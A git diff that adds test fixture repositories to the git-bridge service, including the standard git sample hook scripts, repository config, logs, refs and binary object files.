b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. 
+exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? 
+git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. 
+ +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. 
+# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) 
+ echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/index new file mode 100644 index 0000000..9756dde Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/HEAD new file mode 100644 index 0000000..2c05a99 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/HEAD @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 6c12c073e5702530a9d06b83840d62f8a6621764 Winston Li <git@winston.li> 1471957694 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..2c05a99 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/refs/heads/master @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 6c12c073e5702530a9d06b83840d62f8a6621764 Winston Li <git@winston.li> 1471957694 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/6c/12c073e5702530a9d06b83840d62f8a6621764 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/6c/12c073e5702530a9d06b83840d62f8a6621764 new file mode 100644 index 0000000..00a6b21 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/6c/12c073e5702530a9d06b83840d62f8a6621764 @@ -0,0 +1,2 @@ +x= +1@abzAfH&! ::&x}AO`W溊qngrEϘr.km&FJ٤WOǛ!' 
(r єL۟\ _2 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/7f/37654ebf6d0a19650abbcf5db3953b15001d1b b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/7f/37654ebf6d0a19650abbcf5db3953b15001d1b new file mode 100644 index 0000000..f77bc41 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/7f/37654ebf6d0a19650abbcf5db3953b15001d1b differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/d8/5308af36ff394df8bf063719b2aea26077aaea b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/d8/5308af36ff394df8bf063719b2aea26077aaea new file mode 100644 index 0000000..433ce0d Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/d8/5308af36ff394df8bf063719b2aea26077aaea differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/refs/heads/master new file mode 100644 index 0000000..4b8baba --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/refs/heads/master @@ -0,0 +1 @@ +6c12c073e5702530a9d06b83840d62f8a6621764 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/.gitignore new file mode 100644 index 0000000..f5b2fc4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/.gitignore @@ -0,0 +1,2 @@ ++*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..810e445 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Commit bad gitignore diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. 
+ exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. 
+ +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. 
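+#
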